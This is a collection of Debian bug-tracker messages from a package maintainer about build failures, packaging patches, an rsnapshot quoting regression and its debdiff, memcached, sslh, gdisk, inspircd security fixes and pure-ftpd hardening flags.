> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o qserver.o qserver.c
> gcc -DHAVE_CONFIG_H -I.   -Dsysconfdir=\"/etc\" -D_FORTIFY_SOURCE=2 -DDEBUG 
> -DENABLE_DUMP  -g -O2 -fstack-protector-strong -Wformat 
> -Werror=format-security -Wall -c -o qstat.o qstat.c
> In file included from /usr/include/string.h:634:0,
>  from qstat.c:31:
> qstat.c:2633:7: error: expected identifier or '(' before '__extension__'
>  char *strndup(const char *string, size_t len);
>^
> qstat.c: In function 'do_work':
> qstat.c:3104:18: warning: variable 'fd' set but not used 
> [-Wunused-but-set-variable]
>   int pktlen, rc, fd;
>   ^
> qstat.c: In function 'deal_with_ghostrecon_packet':
> qstat.c:9789:26: warning: variable 'end' set but not used 
> [-Wunused-but-set-variable]
>   char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
>   ^
> qstat.c:9789:18: warning: variable 'start' set but not used 
> [-Wunused-but-set-variable]
>   char str[256], *start, *end, StartFlag, *lpszIgnoreServerPlayer;
>   ^
> In file included from /usr/include/string.h:634:0,
>  from qstat.c:31:
> qstat.c: At top level:
> qstat.c:12121:7: error: expected identifier or '(' before '__extension__'
>  char *strndup(const char *string, size_t len)

Upstream seems to have modified qstat.c to include strndup() only if
needed in recent version of qstat :

https://github.com/multiplay/qstat/commit/9977e09cebc340208ab097f8db619ebc80756859


>^
> Makefile:543: recipe for target 'qstat.o' failed
> make[3]: *** [qstat.o] Error 1
> make[3]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:580: recipe for target 'all-recursive' failed
> make[2]: *** [all-recursive] Error 1
> make[2]: Leaving directory '/tmp/buildd/qstat-2.15'
> Makefile:397: recipe for target 'all' failed
> make[1]: *** [all] Error 2
> make[1]: Leaving directory '/tmp/buildd/qstat-2.15'
> dh_auto_build: make -j1 returned exit code 2
> debian/rules:4: recipe for target 'build' failed
> make: *** [build] Error 2
> dpkg-buildpackage: error: debian/rules build gave error exit status 2
> E: Failed autobuilding of package
> -- 
> Daniel Schepler
> 
> 

-- 
Guillaume Delacour





Bug#800650: Create development header packages

2015-10-31 Thread Guillaume Delacour


On 02/10/2015 at 08:09, Michael D wrote:
> Package: inspircd
> Severity: wishlist
> 
> Hi All,
> 
> I was wondering if there was any interest in creating an inspircd-dev
> package that simply copies over the include/ folder to
> /usr/include/inspircd/ ?

This can be useful if there are some other (external?) extensions that
need to be compiled for inspircd.

I have enabled most (if not all) extensions provided as modules [1]; do
you have an example of an external module?


[1]: http://sources.debian.net/src/inspircd/2.0.20-3/debian/rules/#L19-L24

> Should be simple enough, I can include a patch if really needed.
> 

-- 
Guillaume Delacour





Bug#784915: jessie-pu: package rsnapshot/1.3.1-4

2015-10-25 Thread Guillaume Delacour
Hi,

On 21/08/2015 at 16:34, Adam D. Barratt wrote:

> 
> The package in unstable and testing appears to have been fixed now.
> 
>> In either case, when it comes to an update in stable we'll need a source
>> debdiff of the proposed updated package, built and tested in a Jessie
>> environment, rather than pointers to online patches.
> 
> This is still true, however.

Please find attached a debdiff that fixes the problem in Jessie. I've
tested the fix by defining ssh_args in /etc/rsnapshot.conf and it
works well after the fix (before applying the update, rsnapshot fails
with "rsync: Failed to exec /usr/bin/ssh -p222: No such file or directory").

> 
> Regards,
> 
> Adam
> 

-- 
Guillaume Delacour
diff -Nru rsnapshot-1.3.1/debian/changelog rsnapshot-1.3.1/debian/changelog
--- rsnapshot-1.3.1/debian/changelog2013-07-08 22:54:57.0 +0200
+++ rsnapshot-1.3.1/debian/changelog2015-10-25 23:39:03.0 +0100
@@ -1,3 +1,13 @@
+rsnapshot (1.3.1-4+deb8u1) jessie; urgency=medium
+
+  * debian/patches/14_fix_rsh_args: fix regression on --rsh with args:
+Applied patch from Upstream to fix --rsh command line arguments with 
quotes.
+The --rsh=... argument to rsync was erroneously quoted when added to the
+@rsync_long_args_stack with options set. Thanks Jonas Genannt for the
+help.
+
+ -- Guillaume Delacour <g...@iroqwa.org>  Sun, 25 Oct 2015 23:33:28 +0100
+
 rsnapshot (1.3.1-4) unstable; urgency=low
 
   * debian/patches/01_rsnapshot_conf: Refresh patch to fix path of rsnapshot in
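Review bot: the changelog entry refers to debian/patches/14_fix_rsh_args, but the file added by this debdiff and listed in the series file is 14_fix_rsh_args.diff. Use the full file name in the entry so it matches what is on disk.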
diff -Nru rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 
rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff
--- rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 1970-01-01 
01:00:00.0 +0100
+++ rsnapshot-1.3.1/debian/patches/14_fix_rsh_args.diff 2015-10-25 
23:38:18.0 +0100
@@ -0,0 +1,18 @@
+From: Edwin Mons <g...@home.mons.net>
+Date: Wed, 18 Sep 2013 22:39:11 +0200
+Subject: Fix rsync --rsh command line arguments with quotes
+Bug: 
https://github.com/rsnapshot/rsnapshot/commit/30380587aeab201311af9428f7c47621ade691c8
+
+diff --git a/rsnapshot-program.pl b/rsnapshot-program.pl
+index 85972fd..5a20d0b 100755
+--- a/rsnapshot-program.pl
 b/rsnapshot-program.pl
+@@ -3412,7 +3412,7 @@ sub rsync_backup_point {
+   
+   # if we have any args for SSH, add them
+   if ( defined($ssh_args) ) {
+-  push( @rsync_long_args_stack, 
"--rsh=\"$config_vars{'cmd_ssh'} $ssh_args\"" );
++  push( @rsync_long_args_stack, 
"--rsh=$config_vars{'cmd_ssh'} $ssh_args" );
+   
+   # no arguments is the default
+   } else {
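Review bot: the header of the embedded patch puts the upstream commit URL in a `Bug:` field, which DEP-3 reserves for a bug tracker entry. Move the commit URL to `Origin: upstream, <url>` and, if a bug reference is wanted, point `Bug-Debian:` at the Debian report. Since the fix works by dropping the embedded double quotes, a one-line comment above the push() stating that the `--rsh=` value is passed to rsync as a single argument would make a later re-quoting less likely.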
diff -Nru rsnapshot-1.3.1/debian/patches/series 
rsnapshot-1.3.1/debian/patches/series
--- rsnapshot-1.3.1/debian/patches/series   2013-07-08 22:27:41.0 
+0200
+++ rsnapshot-1.3.1/debian/patches/series   2015-10-25 23:33:09.0 
+0100
@@ -8,3 +8,4 @@
 11_lvm_snapshots.diff
 12_include_conf_with_arguments.diff
 13_print_warn.diff
+14_fix_rsh_args.diff




Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t

2015-07-20 Thread Guillaume Delacour
On Mon, 29 Jun 2015 22:40:01 +0200 Guillaume Delacour g...@iroqwa.org
wrote:
>>
>> This package FTBFS in a clean sid sbuild setup:
>>
>> t/line-lengths.t . ok
>> Timeout.. killing the process
>> t/lru-crawler.t ..
>> Failed 126/221 subtests
>
> Seems to be a random issue that affects other distributions (I'm quite
> sure to have reproduced it at least one time a long time ago, but
> wrongly guessed this was my env):
>
> http://forums.famillecollet.com/viewtopic.php?id=3165
> https://code.google.com/p/memcached/issues/detail?id=398
> http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk
>
> I've opened an issue on upstream googlecode (as the GitHub memcached space
> doesn't let me create issues) to have his point of view about this issue.

Upstream and I don't reproduce the problem, do you?
I tried to iterate around 250 times on this test and never reproduced this.

$ while true ; do prove t/lru-crawler.t ; done

If you reproduce it, don't hesitate to give me as many details as
possible so that I/upstream can reproduce and fix this issue.

--
Guillaume Delacour





Bug#717451: Backups broken when ssh_args are set

2015-07-19 Thread Guillaume Delacour
fixed 717451 1.4.0-1
thanks

On Wed, 15 Jul 2015 19:42:21 -0400 Michel synth17+deb-b...@gmail.com
wrote:
> Package: rsnapshot
> Version: 1.3.1-7
> Followup-For: Bug #717451
>
>
> Dear Maintainer,
>
> After upgrading rsnapshot to 1.3.1-7, remote backups still fail. Local
> backups work as expected. The upgrade occurred on 06/24/2015, and every
> remote backup since then has failed. Have been extremely busy and have
> not checked local email, until today. To my surprise, have no remote
> backups since 06/24.



I've pushed the 1.4.0-1 release that fixes that kind of problem.
Feel free to reopen if it is not the case.

--
Guillaume Delacour





Bug#686956: incompatible with sslh

2015-07-19 Thread Guillaume Delacour
reassign 686956 mosh
fixed 686956 1.2.4.95rc2-1
thanks

Hi,

I'm reassigning this bug only to mosh and documenting the version which
includes the binding option.

On Tue, 30 Apr 2013 10:05:21 -0400 Keith Winstein kei...@mit.edu wrote:
> This is fixed in git (adding a new mosh option, --bind-server=ANY) and
> will be in the next release.
>
> On Fri, Sep 7, 2012 at 12:12 PM, chrysn chr...@fsfe.org wrote:
>> Package: mosh, sslh
>> Severity: minor
>>
>> mosh can't be used on hosts that hide their ssh services behind sslh.
>>
>> when connecting to such a host, mosh displays
>>
>> mosh: Nothing received from server on UDP port 60001.
>>
>> then:
>>
>> mosh: Nothing received from server on UDP port 60001. (... s without
>> contact)
>>
>> the problem seems to be caused by the way the ssh connection is
>> established in sslh: sslh forwards the connection by creating another
>> tcp stream from itself to the ssh server, causing SSH_CONNECTION have
>> 127.0.0.1 in both source and destination ip fields -- and mosh, when
>> started with -s, binds to the address it finds in SSH_CONNECTION.
>>
>> the mosh server seems to get started with -s automatically (even though
>> the client seems to just call mosh-server, it shows up in the process
>> list as `mosh-server new -s ...`).
>>
>>
>> several solutions seem feasible, in increasing order of my preference:
>>
>> * provide a way for the client to specify he doesn't want to use the
>>   `-s` option server-side (fix on mosh side)
>> * have a server-side configuration option to turn off the `-s` flag for
>>   the host (better, as it has to be done only once per host) (fix on
>>   mosh side)
>> * provide a way to find out the real address (fix on ssh side)
>>
>>
>> as a workaround, i have provided a way around sslh for clients to
>> connect directly, but that's not usually what an sslh user wants to do.
>>
>> -- System Information:
>> Debian Release: wheezy/sid
>>   APT prefers unstable
>>   APT policy: (500, 'unstable'), (1, 'experimental')
>> Architecture: amd64 (x86_64)
>> Foreign Architectures: i386
>>
>> Kernel: Linux 3.4-trunk-amd64 (SMP w/2 CPU cores)
>> Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
>> Shell: /bin/sh linked to /bin/dash
>>
>> Versions of packages mosh depends on:
>> ii  libc6           2.13-35
>> ii  libgcc1         1:4.7.1-7
>> ii  libio-pty-perl  1:1.08-1+b2
>> ii  libprotobuf7    2.4.1-3
>> ii  libstdc++6      4.7.1-7
>> ii  libtinfo5       5.9-10





Bug#789835: memcached: FTBFS in sid: timeout in t/lru-crawler.t

2015-06-29 Thread Guillaume Delacour
forwarded 789835 https://code.google.com/p/memcached/issues/detail?id=417
thanks

On Wed, 24 Jun 2015 22:02:48 +0100 Dominic Hargreaves d...@earth.li wrote:
 Source: memcached
 Version: 1.4.24-1
 Severity: serious
 Justification: FTBFS

Hi,

 
 This package FTBFS in a clean sid sbuild setup:
 
 t/line-lengths.t . ok
 Timeout.. killing the process
 t/lru-crawler.t .. 
 Failed 126/221 subtests 

Seems to be a random issue that affects other distributions (I'm quite
sure I reproduced it at least once a long time ago, but wrongly
guessed this was my env):

http://forums.famillecollet.com/viewtopic.php?id=3165
https://code.google.com/p/memcached/issues/detail?id=398
http://webcache.googleusercontent.com/search?q=cache:2j2npL8eOAMJ:https://arch-ci.org/extra/memcached/log/+cd=10hl=frct=clnk

I've opened an issue on upstream googlecode (as the GitHub memcached space
doesn't let me create issues) to get upstream's point of view about this issue.

 
 Cheers,
 Dominic.
 
 





Bug#784357: memcached multi instance startup/shutdown broken

2015-05-23 Thread Guillaume Delacour
On Tue, 05 May 2015 21:02:26 +0300 Albertas Sileika a.sile...@gmail.com wrote:
 Package: memcached
 Version: 1.4.21-1.1
 Severity: normal
 
 Dear Maintainer,

Hi,

 
 
 In wheezy there was possibility to start/stop multiple memcached instance via 
 /etc/init.d/memcached.
 After upgrade to jessie this possibility is lost (without rewriting unit 
 files).

You're absolutely right, we didn't have the time to work on this before the 
release.
For now, I don't see any other possibility than writing another systemd
unit file (but suggestions are welcome).

-- 
Guillaume Delacour g...@iroqwa.org




Bug#774707: sslh: Installation of sslh breaks xinetd if clients are connected

2015-05-23 Thread Guillaume Delacour
tags 774707 + moreinfo
thanks

Le mardi 06 janvier 2015 à 15:47 +0100, Fabian Kurz a écrit :
 
 The problem appears to be in line 32 of postinst:
 
 # disable to force user to configure inetd mode
 # and disable if standalone mode
 update-inetd --disable https
 
 This command appears to fail if there are existing connections to any xinetd
 service.

I use update-inetd to enable/disable the sslh service, and this utility
(according to its description) doesn't seem to support xinetd, but
xinetd depends on it.

Anyway, i've tested this on jessie:

- install xinetd 1:2.3.15-3 (and update-inetd 4.43, by depends)
- enable echo service in /etc/xinetd.d/echo and connect to it
- install sslh 1.16-2, default standalone
- call update-inetd --disable https :

# update-inetd --disable https
# echo test | nc localhost 7
test
^C

My echo session was never disconnected by the removal of sslh, and the
xinetd service always listens and accepts new connections on 7/tcp.

Can you reproduce the problem on Jessie?

-- 
Guillaume Delacour g...@iroqwa.org




Bug#784915: jessie-pu: package rsnapshot/1.3.1-4

2015-05-10 Thread Guillaume Delacour
Package: release.debian.org
Severity: normal
Tags: jessie
User: release.debian@packages.debian.org
Usertags: pu


Hi,

I've introduced [1] in rsnapshot version 1.3.1-4 a problem which affects
multiple users: when defining custom ssh_args, they're not properly
interpreted (erroneously quoted).
This seems to have been introduced by my refresh of the patch 10_space_destdir
[2].

I can propose to fix the first problem by integrating the patch [3] I've
prepared for a newer release of the package. Upstream has patched [4] rsnapshot
as well.

If this is ok, i can prepare a package for stable.

Thanks in advance.

[1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=717451
[2]: http://sources.debian.net/src/rsnapshot/1.3.1-4/debian/patches/10_space_destdir.diff/
[3]: http://sources.debian.net/src/rsnapshot/1.3.1-6/debian/patches/14_rsync_rsh_quoting.diff/
[4]: https://github.com/rsnapshot/rsnapshot/pull/15

-- System Information:
Debian Release: stretch/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.13.0-49-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash
Init: unable to detect



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#717451: rsnapshot Backups broken when ssh_args are set

2015-05-10 Thread Guillaume Delacour
Le dimanche 10 mai 2015 à 03:14 +0200, John Paul Adrian Glaubitz a
écrit :
 Hello!

Hi,

 
 That debdiff is incomplete. The description in the changelog of the
 changes is insufficient and the actual patch is missing as well.
 
 Has this issue been fixed upstream already? If yes, we could just
 cherrypick the patch or upload a new upstream version.

I've asked the release team to include the patch for fixing this issue.
I'm waiting for them to propose the fixed package (but I may have to
include it in unstable first).

 
 Cheers,
 Adrian
 

-- 
Guillaume Delacour g...@iroqwa.org




Bug#780880: inspircd: CVE-2012-1836 patch incorrect

2015-03-25 Thread Guillaume Delacour
Le vendredi 20 mars 2015 à 22:05 +, Adam a écrit :
 Package: inspircd
 Version: 2.0.5-1+b1
 Severity: grave
 Tags: security
 Justification: user security hole
 
 Hi,
 
 I am an upstream maintainer for InspIRCd. The patch you have for 
 CVE-2012-1836 (patches/03_CVE-2012-1836.diff) is not the same patch
 we released as part of 2.0.7 (there was no 2.0.6) to address the CVE. It 
 appears to be a version of this commit: 
 https://github.com/inspircd/inspircd/commit/9aa28f3730fb3dd69c1e06f78bb2bbc43d36c684.
 However this commit was never in a release, and was only in git for about 6 
 days (due to someone other than me pulling it in). I looked at the CVE and 
 addressed it with two followup
 commits later.
 
 This commit and your patch do not fix the problem. You can still send 
 maliciously crafted packets and cause remote code execution. This was fixed
 in 
 https://github.com/inspircd/inspircd/commit/ed28c1ba666b39581adb860bf51cdde43c84cc89,
  prior to the 2.0.7 release.
 
 Furthermore, your patch introduces a buffer underflow where it has i =- 12 
 and not i -= 12. This causes it to start reading from before the packet's 
 buffer. It is unclear
 to me what this can cause.
 
 Additionally, at the same time I committed 
 58c893e834ff20495d007709220881a3ff13f423 to prevent malicious packets from 
 causing InspIRCd to infinite loop. This is not a part of the CVE
 as it does not allow remote code execution, but is still a critical problem 
 due to the potential for denial of service.
 
 You should perhaps apply these two patches on top of your existing ones, or 
 maybe fetch the dns.cpp file off of 2.0.7 here: 
 https://github.com/inspircd/inspircd/blob/v2.0.7/src/dns.cpp.
 It does not change much.
 
 I would be willing to go through and provide a proper set of patches for this 
 and other less-severe issues if requested. I do not want to do it up front 
 because it would be a lot
 of work, and I am not sure whether or not it would be accepted. You have a 
 very, very old InspIRCd version, and there is a lot of stuff to sift through 
 (about 3 years). Let me know.

I'll try to apply the diff for src/dns.cpp between the 2.0.5 and 2.0.7
releases as you suggest and will test it (yes, I personally use
inspircd).
When done, I'll contact the Debian security team for an upload to the
security archive.

As the new stable version Debian 8 Jessie is about to be frozen/released, I
don't think I'll find a sponsor to upload a 2.0.17 backport of inspircd
for the current Debian 7 Wheezy.

 
 Thanks,
 
 Adam
 





Bug#779797: gdisk: Returns exit code 1 after successful operations

2015-03-12 Thread Guillaume Delacour
severity 779797 serious
thanks

Le mercredi 04 mars 2015 à 21:55 +0100, intrig...@debian.org a écrit :
 Package: gdisk
 Version: 0.8.10-1
 Severity: important
 X-Debbugs-Cc: u...@451f.org
 
 Hi,

Hi,

 
 tl;dr:
 
   * In Wheezy, gdisk correctly returns exit code 0 upon success.
 
   * In Jessie, gdisk mistakenly returns exit code 1 after various
 successful operations. This breaks any tool that uses gdisk for
 such operations... and bothers checking its exit code. No idea if
 the reverse-dependencies in Debian are affected, but it does break
 Tails Installer (not in Debian yet, will be uploaded by the end of
 August) on Jessie.
 
   * This regression has been identified upstream in March, 2014.
 It was fixed in upstream Git back then. It's the HEAD of their
 master branch, and no release was put out since.
 
 The attached patchset imports the fix from upstream (not the entire
 commit, that sadly is non-atomic and contains unrelated changes --
 just the relevant changes), and updates d/changelog accordingly.
 I've generated with git format-patch from the Vcs-Git.

I've also patched gdisk_test.sh to test the return code of partition table
creation, as you did in your test.

 
 The attached reproducer script allows anyone to confirm the summary
 I made above. The results I see on Wheezy, Jessie, and Jessie + the
 upstream fix follow.
 
 With my Tails hat, I'd love to see this bug fixed in Jessie (otherwise
 we'll have to ship a modified gdisk in Tails).
 
 With my Debian hat, I'm unsure. On the one hand, arguably it's not RC,
 and if nobody reported this bug at this stage of the release cycle,
 then it's probably big deal to release with it, and not worth taking
 the risk to modify the package. On the other hand that's a nasty
 regression, and we don't know how many home-made scripts running under
 `set -e' will be broken once their authors upgrade their systems
 to Jessie.
 
 Guillaume, what do you think? If you feel it's RC, please bump
 severity. I can take care of NMU'ing and talking to the release team
 if it helps — just let me know.

I've prepared a fixed version on mentors:
http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc
It would be great if you could upload it to unstable and include it for
Jessie (as I've bumped the severity to serious; I agree with you that
without the upstream fix, it can break user scripts).


-- 
Guillaume Delacour g...@iroqwa.org




Bug#779797: gdisk: Returns exit code 1 after successful operations

2015-03-12 Thread Guillaume Delacour
On Thu, Mar 12, 2015 at 03:08:31PM +0100, intrigeri wrote:
 Hi Guillaume,
 
 Guillaume Delacour wrote (10 Mar 2015 21:51:39 GMT) :
  I've also patched gdisk_test.sh to test return code of partition table
  creation, like you've made in your test.
 
 Great! Now, I don't see this change applied upstream, so it should
 *not* go into the same quilt patch as the one we've cherry-picked
 from upstream. Could you please fix that?

Split into two patches.

 
 Also, has this additional change been forwarded upstream yet? DEP-3
 says Any value other than no or not-needed means that the patch
 has been forwarded upstream for the Forwarded field.

The shell script I submitted upstream a few years ago needs to be modified
with redundant if/else blocks. I'm not sure now how to modify all tests to
check return codes. I consider my patch a non-regression test for this
bug only. This is why I've made the change in this way.

 
  I've prepared a fixed version on mentors:
  http://mentors.debian.net/debian/pool/main/g/gdisk/gdisk_0.8.10-2.dsc
 
 I'm reviewing the one in the Vcs-Git. Hopefully it's the same.
 Note that the main goal of my review is to increase chances the
 resulting package is granted an unblock request.
 
  * Why was the Bug: DEP-3 field, that was in the patch I've
proposed, removed?
  * Are you sure that the trailing comma in the DEP-3 Origin: field
is legit?

I've totally imported your proposal and built a new -2 package.

 
 Other than these few nitpicking comments, it looks good \o/
 
  It would be great if you can upload it to unstable and include it for
  Jessie (as i've bumped the severity to serious; i agree with you that
  without the upstream fix, it can break user scripts).
 
 I'll gladly do that once we agree on the content of the package to
 upload :)
 
 Cheers,
 -- 
 intrigeri

-- 
Guillaume Delacour




Bug#628659: [php-maint] Bug#628659: please support IPv6 connections

2015-02-17 Thread Guillaume Delacour
On Tue, 31 May 2011 12:51:49 +0200 martin f krafft madd...@debian.org wrote:
 forwarded 628659 http://pear.php.net/bugs/bug.php?id=18575
 tags 628659 upstream
 thanks
 
 also sprach Thomas Goirand tho...@goirand.fr [2011.05.31.1105 +0200]:
  While I'm ok to maintain the *package* for php-net-smtp (as being
  part of the pkg-php team), but I wont do any new code on it (just
  eventually fixing issues), especially new features. So best might
  be to send a bug report upstream (there's also a bug tracker at
  pear.php.net), or send a patch (here and upstream).
 
 Done.

The problem was in Net::Socket, which is a Net::SMTP dependency.
Anyway, the problem has been fixed in version 1.0.13 since 2013-05-22 (Debian
now has 1.0.14, and I've tested the SMTP connection with php-net-smtp, which is
OK with this version).
I'll reassign this bug to php-net-socket and mark it fixed in the corresponding
version.

FYI, Net::Socket uses PHP's fsockopen(), and it first connects over IPv6 when
available (not sure how it is managed in the PHP source code).

 
 -- 
  .''`.   martin f. krafft madduck@d.o  Related projects:
 : :'  :  proud Debian developer   http://debiansystem.info
 `. `'`   http://people.debian.org/~madduckhttp://vcs-pkg.org
   `-  Debian - when you have better things to do than fixing systems
  
 in diving to the bottom of pleasure
  we bring up more gravel than pearls.
-- honoré de balzac





Bug#743310: rsnapshot: Program calls with arguments containing quotations mark don't work anymore

2015-02-12 Thread Guillaume Delacour
Le lundi 09 février 2015 à 23:07 +, Christoph Egger a écrit :
 Package: rsnapshot
 Version: 1.3.1-4
 Followup-For: Bug #743310
 
 Hi!

Hi,

 
 Guess it has something to do with additional quoting. Makes rsnapshot mostly 
 useless for me.

I'm sorry to have introduced such a problem by cherry-picking the
upstream patch; the last known author is about to hand over the
maintenance of rsnapshot (due to inactivity) to other users to fix some
old code base of the software
(https://github.com/bebehei/rsnapshot/issues/1).

I missed the freeze deadline by trying to update rsnapshot to the
latest upstream git repo (there were lots of changes and improvements I
wanted to get done and the project started to become inactive) and it is too
late for this important fix.
I'll try to look further into the takeover to see what happens.

 
 /etc/rsnapshot.conf
 # ssh has no args passed by default, but you can specify some here.
 #
 ssh_args	-i /root/.ssh/id_rsa_backup
 
 
 /bin/cp -al /srv/rsnapshot/daily.0 /srv/rsnapshot/daily.1 
 /usr/bin/rsync -ax --delete --numeric-ids --relative --delete-excluded \
 --rsh=/usr/bin/ssh -i /root/.ssh/id_rsa_backup \
 user@host:path \
 /srv/rsnapshot/daily.0/entry/ 
 rsync: Failed to exec /usr/bin/ssh -i /root/.ssh/id_rsa_backup: No such file 
 or directory (2)
 rsync error: error in IPC code (code 14) at pipe.c(85) [Receiver=3.1.1]
 rsync: connection unexpectedly closed (0 bytes received so far) [Receiver]
 rsync error: error in IPC code (code 14) at io.c(226) [Receiver=3.1.1]
 
 
 -- System Information:
 Debian Release: 8.0
   APT prefers testing
   APT policy: (500, 'testing')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.16.0-4-amd64 (SMP w/2 CPU cores)
 Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash
 Init: systemd (via /run/systemd/system)
 
 Versions of packages rsnapshot depends on:
 ii  liblchown-perl  1.01-2+b1
 ii  logrotate   3.8.7-1+b1
 ii  perl            5.20.1-5
 ii  rsync   3.1.1-2+b1
 
 Versions of packages rsnapshot recommends:
 ii  openssh-client [ssh-client]  1:6.7p1-3
 
 rsnapshot suggests no packages.
 
 -- Configuration Files:
 /etc/cron.d/rsnapshot changed [not included]
 /etc/rsnapshot.conf changed [not included]
 
 -- no debconf information
 





Bug#769261: sslh: FTBFS in jessie/i386: Build killed with signal TERM after 150 minutes of inactivity

2014-11-12 Thread Guillaume Delacour
On Wed, Nov 12, 2014 at 11:41:57AM +0100, Lucas Nussbaum wrote:
 Source: sslh
 Version: 1.16-2
 Severity: serious
 Tags: jessie sid
 User: debian...@lists.debian.org
 Usertags: qa-ftbfs-20141112 qa-ftbfs
 Justification: FTBFS in jessie on i386
 
 Hi,

Hi,

 
 During a rebuild of all packages in jessie (in a jessie chroot, not a
 sid chroot), your package failed to build on i386.
 
 Relevant part (hopefully):

You've missed a relevant part from the build log:

[...]
./sslh-select -v -f -u user --listen localhost:9002 --ssh ::1:9000 --ssl 
::1:9001 -P /tmp/sslh_test.pid
ssh addr: localhost:9000. libwrap service: sshd family 10 10
ssl addr: localhost:9001. libwrap service: (null) family 10 10
listening on:
localhost:9002
localhost:9002
timeout: 2
on-timeout: ssh
listening to 2 addresses
localhost:9002:bind: Address already in use
[...]

Apparently, the bind of localhost:9002 fails on this machine; is there any other
process listening on this socket?

  ***Test: One SSL half-started then one SSH
  Connection refused
  ***Test: One SSH half-started then one SSL
  Connection refused
  cat: /tmp/sslh_test.pid: No such file or directory
  killing 
  Can't kill a non-numeric process ID at ./t line 221.
  # Looks like your test exited with 1 before it could output anything.
  make[1]: *** [test] Error 1
  Makefile:99: recipe for target 'test' failed
  make[1]: Leaving directory '/«PKGBUILDDIR»'
  dh_auto_test: make -j1 test returned exit code 2
  make: *** [build] Error 2
  debian/rules:31: recipe for target 'build' failed
  dpkg-buildpackage: error: debian/rules build gave error exit status 2
  Build killed with signal TERM after 150 minutes of inactivity
 
 The full build log is available from:

 http://aws-logs.debian.net/ftbfs-logs/2014/11/12/sslh_1.16-2_jessie-i386.log
 
 A list of current common problems and possible solutions is available at
 http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
 
 About the archive rebuild: The rebuild was done on EC2 VM instances from
 Amazon Web Services, using a clean, minimal and up-to-date chroot. Every
 failed build was retried once to eliminate random failures.

-- 
Guillaume Delacour




Bug#767034: sslh has USELIBWRAP off by default

2014-10-27 Thread Guillaume Delacour
fixed 767034 1.16-1
thanks

Le lundi 27 octobre 2014 à 22:36 +0100, Christian Weinberger a écrit :
 Package: sslh
 Version: 1.13b-3.2
 Severity: important
 
 Dear Maintainer,

Hi,

 
 sslh has USELIBWRAP off by default while openssh-server has libwrap support 
 enabled by default in Debian.
 So sslh default is not in line with the openssh-server default, which is in 
 my eyes not what I expected and therefore a security risk.
 
 Recommendation: Activate USELIBWRAP by default.

USELIBWRAP will be used in the next stable release 1.16-1 (and with
LIBCAP for GNU/Linux):

http://anonscm.debian.org/cgit/collab-maint/sslh.git/tree/debian/rules#n20

 
 
 Best regards,
 Christian
 
 -- System Information:
 Debian Release: 7.7
   APT prefers stable
   APT policy: (600, 'stable'), (500, 'testing'), (50, 'unstable')
 Architecture: amd64 (x86_64)
 Foreign Architectures: i386
 
 Kernel: Linux 3.16-0.bpo.2-amd64 (SMP w/2 CPU cores)
 Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) (ignored: 
 LC_ALL set to de_DE.UTF-8)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages sslh depends on:
 ii  adduser   3.113+nmu3
 ii  debconf   1.5.49
 ii  libc6 2.19-11
 ii  libconfig9    1.4.8-5
 ii  lsb-base  4.1+Debian8+deb7u1
 ii  update-inetd  4.43
 
 Versions of packages sslh recommends:
 ii  apache2  2.2.22-13+deb7u3
 ii  apache2-mpm-prefork [httpd]  2.2.22-13+deb7u3
 ii  dropbear [ssh-server]        2012.55-1.3
 ii  openssh-server [ssh-server]  1:6.0p1-4+deb7u2
 
 Versions of packages sslh suggests:
 ii  xinetd [inet-superserver]  1:2.3.14-7.1+deb7u1
 
 -- Configuration Files:
 /etc/default/sslh changed [not included]
 
 -- debconf information excluded





Bug#767039: FTBFS on GNU/Hurd

2014-10-27 Thread Guillaume Delacour
Package: memcached
Version: 1.4.21-1
Severity: normal


Just for the record, I tried to fix the FTBFS on GNU/Hurd:
* Temp-declare MAXPATHLEN in memcached.c, just to continue the build
* The build finishes fine, but the upstream test suite t/stats-conns.t fails on
  the call of getpeername(2) on a UNIX domain socket, as they're not supported
  on Hurd (pflocal/pf.c, S_socket_whatis_address). Maybe the same problem in
  t/unixsocket.t.
  I don't really understand why getpeername is called at line 415, as
  tcp_transport is not tcp (needs further investigation).

Help (and patches) welcome, work started on 




Bug#764537: Hardening options incomplete: unapplied FORTIFY_SOURCE

2014-10-08 Thread Guillaume Delacour
Package: pure-ftpd
Version: 1.0.36-2
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening




Hello,

Hardened build features used through dpkg-buildflags are all used in the
upstream build system (plus bindnow and pie).
However, the FORTIFY_SOURCE CPPFLAGS is not applied because gcc optimizations
are not used; see dpkg-buildflags(1) for more information.
Adding -O2 to CFLAGS in debian/rules seems to be sufficient to enable
fortify_source.

Please also note that blhc reports false positives against build flags
because upstream flags are not equal to Debian's choices:
* CFLAGS
 + upstream
   -fno-strict-aliasing -fno-strict-overflow -fstack-protector-all
 + dpkg-buildflags:
   -fstack-protector-strong -Wformat -Werror=format-security
* LDFLAGS
 + upstream: -z relro -z now
 + dpkg-buildflags: -Wl,-z,relro -Wl,-z,now
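
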